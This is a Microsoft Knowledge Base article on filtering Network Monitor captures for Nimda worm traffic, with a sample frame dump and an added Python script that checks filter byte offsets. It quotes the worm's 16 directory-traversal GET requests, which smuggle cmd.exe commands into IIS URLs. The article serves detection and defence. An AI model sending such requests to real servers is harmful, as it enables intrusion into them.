Microsoft KB Archive/317605

= How to Set a Filter to Capture Only Nimda Frames in Network Monitor =

Article ID: 317605

Article Last Modified on 3/2/2007

-

APPLIES TO


 * Microsoft Windows 2000 Server
 * Microsoft Windows 2000 Advanced Server
 * Microsoft Windows 2000 Professional Edition

-



This article was previously published under Q317605



SUMMARY
This article describes how to set a capture filter to capture only the first Nimda GET request frame in Network Monitor.



MORE INFORMATION
In some Microsoft-based networks, a remnant of Nimda-infected computers may still be operating. The CERT Advisory CA-2001-26 "Nimda Worm" document states that the Nimda worm sends the following 16 HTTP GET requests (CERT writes the non-printable bytes in these requests as \x escapes):

 * GET /scripts/root.exe?/c+dir
 * GET /MSADC/root.exe?/c+dir
 * GET /c/winnt/system32/cmd.exe?/c+dir
 * GET /d/winnt/system32/cmd.exe?/c+dir
 * GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
 * GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
 * GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
 * GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1x1c../winnt/system32/cmd.exe?/c+dir
 * GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
 * GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
 * GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
 * GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
 * GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
 * GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
 * GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
 * GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

This article describes how to set up a capture filter with the criteria of the first GET request:

GET /scripts/root.exe?/c+dir

To set up a capture filter with the criteria of the first GET request:
 * 1) On the Capture menu, click Filter, and then double-click Pattern Matches.
 * 2) In the Pattern box, click the ASCII option, and then type root.exe. Note that root.exe is case-sensitive, and that it is 726F6F742E657865 after it is converted to hexadecimal.
 * 3) In the Offset box, type 43, and then click From Start of Frame.
 * 4) Click OK, and then click OK.
 * 5) Start the capture.

For more information about how to use Network Monitor, see the Network Monitor Help file in the "Systems Management Server Administrator's Guide."

Example of the Complete Frame
1 1044.932539 00D0062C24A0 LOCAL HTTP GET Request (from client using port 1636) NimdaHost WebServer IP

Frame: Base frame properties
Frame: Time of capture = 2/1/2002 13:8:0.266
Frame: Time delta from previous physical frame: 0 microseconds
Frame: Frame number: 1
Frame: Total frame length: 126 bytes
Frame: Capture frame length: 126 bytes
Frame: Frame data: Number of data bytes remaining = 126 (0x007E)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 00C04F27CE94
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00D0062C24A0
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 126 (0x007E)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 112 (0x0070)
IP: ID = 0xFF7E; Proto = TCP; Len: 112
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 112 (0x70)
IP: Identification = 65406 (0xFF7E)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 125 (0x7D)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0xB33E
IP: Source Address = 10.57.133.198
IP: Destination Address = 10.57.138.145
IP: Data: Number of data bytes remaining = 92 (0x005C)
TCP: .AP..., len:  72, seq:1447167973-1447168045, ack:  48848871, win:17520, src: 1636  dst:   80
TCP: Source Port = 0x0664
TCP: Destination Port = Hypertext Transfer Protocol
TCP: Sequence Number = 1447167973 (0x564207E5)
TCP: Acknowledgement Number = 48848871 (0x2E95FE7)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 17520 (0x4470)
TCP: Checksum = 0x7BCA
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 72 (0x0048)
HTTP: GET Request (from client using port 1636)
HTTP: Request Method = GET
HTTP: Uniform Resource Identifier = /scripts/root.exe?/c+dir
HTTP: Protocol Version = HTTP/1.0
HTTP: Host = www
HTTP: Undocumented Header = Connection: close
HTTP: Undocumented Header Fieldname = Connection
HTTP: Undocumented Header Value = close
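As an added illustration (not part of the original article, and not Network Monitor code), the following Python script rebuilds a frame with the same header layout as the dump above and shows why the Offset value 43 lines up with root.exe: read as hexadecimal, 0x43 is 67 decimal, which is the 14-byte Ethernet II header plus the 20-byte IP header plus the 20-byte TCP header plus the 13 bytes of "GET /scripts/" that precede the pattern. It also shows the check a practitioner would want before trusting a fixed-offset filter: an 802.1Q VLAN tag or TCP options push the payload further into the frame, so the same filter silently misses those frames. The frame bytes, the reuse of the dump's MAC and IP addresses, and the names build_frame, tcp_payload_offset, pattern_offset, offset_box_value and fixed_offset_match are all constructed for this example; that the Offset box is read as hexadecimal is an assumption, supported by the arithmetic above.

```python
import struct

PATTERN = b"root.exe"      # the ASCII pattern from the article (726F6F742E657865)
NETMON_OFFSET = 0x43       # the article's Offset box value, assumed to be hexadecimal

# Constructed sample values; they mirror the addresses in the article's frame dump.
DST_MAC = bytes.fromhex("00C04F27CE94")
SRC_MAC = bytes.fromhex("00D0062C24A0")
REQUEST = (b"GET /scripts/root.exe?/c+dir HTTP/1.0\r\n"
           b"Host: www\r\nConnection: close\r\n\r\n")


def ip_checksum(header: bytes) -> int:
    """One's-complement checksum over an IPv4 header (checksum field zeroed)."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_frame(vlan_id=None, tcp_options=b"", payload=REQUEST) -> bytes:
    """Build an Ethernet II / IPv4 / TCP frame carrying `payload` (constructed).

    vlan_id inserts an 802.1Q tag; tcp_options is appended to the TCP header and
    must be a multiple of 4 bytes. The TCP checksum is left at zero: the point
    of the exercise is byte offsets, not a wire-valid segment.
    """
    if len(tcp_options) % 4:
        raise ValueError("TCP options must pad to 32-bit words")
    tcp_hdr_len = 20 + len(tcp_options)
    tcp = struct.pack("!HHIIBBHHH",
                      1636, 80,                       # client port 1636 -> HTTP
                      0x564207E5, 0x02E95FE7,         # seq / ack as in the dump
                      (tcp_hdr_len // 4) << 4, 0x18,  # data offset, flags .AP
                      17520, 0, 0) + tcp_options      # window, checksum, urgent
    ip_total = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s",
                     0x45, 0, ip_total, 0xFF7E, 0x4000, 125, 6, 0,
                     bytes([10, 57, 133, 198]), bytes([10, 57, 138, 145]))
    ip = ip[:10] + struct.pack("!H", ip_checksum(ip)) + ip[12:]
    eth = DST_MAC + SRC_MAC
    if vlan_id is not None:
        eth += struct.pack("!HH", 0x8100, vlan_id & 0x0FFF)
    eth += struct.pack("!H", 0x0800)
    return eth + ip + tcp + payload


def tcp_payload_offset(frame: bytes) -> int:
    """Walk the Ethernet, 802.1Q, IPv4 and TCP headers; return the offset of the
    first TCP payload byte from the start of the frame."""
    pos = 12
    ethertype = struct.unpack_from("!H", frame, pos)[0]
    pos += 2
    while ethertype == 0x8100:                  # skip VLAN tag(s)
        ethertype = struct.unpack_from("!H", frame, pos + 2)[0]
        pos += 4
    if ethertype != 0x0800:
        raise ValueError("not an IPv4 frame")
    if frame[pos + 9] != 6:
        raise ValueError("not a TCP segment")
    pos += (frame[pos] & 0x0F) * 4              # IHL, in 32-bit words
    pos += (frame[pos + 12] >> 4) * 4           # TCP data offset, in 32-bit words
    return pos


def pattern_offset(frame: bytes, pattern: bytes = PATTERN) -> int:
    """Offset of `pattern` inside the TCP payload, measured from the start of
    the frame; -1 if the payload does not contain it."""
    return frame.find(pattern, tcp_payload_offset(frame))


def offset_box_value(frame: bytes, pattern: bytes = PATTERN) -> str:
    """The value to type into the Offset box for this frame layout (hex digits)."""
    return format(pattern_offset(frame, pattern), "X")


def fixed_offset_match(frame: bytes, pattern: bytes = PATTERN,
                       offset: int = NETMON_OFFSET) -> bool:
    """What a 'Pattern Matches' capture filter does: compare the bytes at one
    fixed offset from the start of the frame, with no header parsing."""
    return frame[offset:offset + len(pattern)] == pattern


if __name__ == "__main__":
    variants = {
        "plain Ethernet II, no TCP options": build_frame(),
        "802.1Q tagged (VLAN 100)": build_frame(vlan_id=100),
        "TCP timestamp option (12 bytes)": build_frame(
            tcp_options=b"\x01\x01\x08\x0a" + b"\x00" * 8),
    }
    for name, frame in variants.items():
        print("%-36s payload@%2d  pattern@0x%s  fixed-offset 0x43 match: %s"
              % (name, tcp_payload_offset(frame), offset_box_value(frame),
                 fixed_offset_match(frame)))
```

Running the script prints the payload offset, the Offset box value and the fixed-offset result for the three frame variants: the plain frame matches at 0x43, while the tagged frame (pattern at 0x47) and the frame with TCP options (pattern at 0x4F) do not. When the capture may include tagged frames or hosts that negotiate TCP options, a header-aware check such as pattern_offset, or a filter that matches on the payload rather than a single absolute offset, is the more reliable way to pick these frames out.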

Additional query words: netmon bloodhound bh

Keywords: kbenv kbhowto kbnetwork KB317605

-


© Microsoft Corporation. All rights reserved.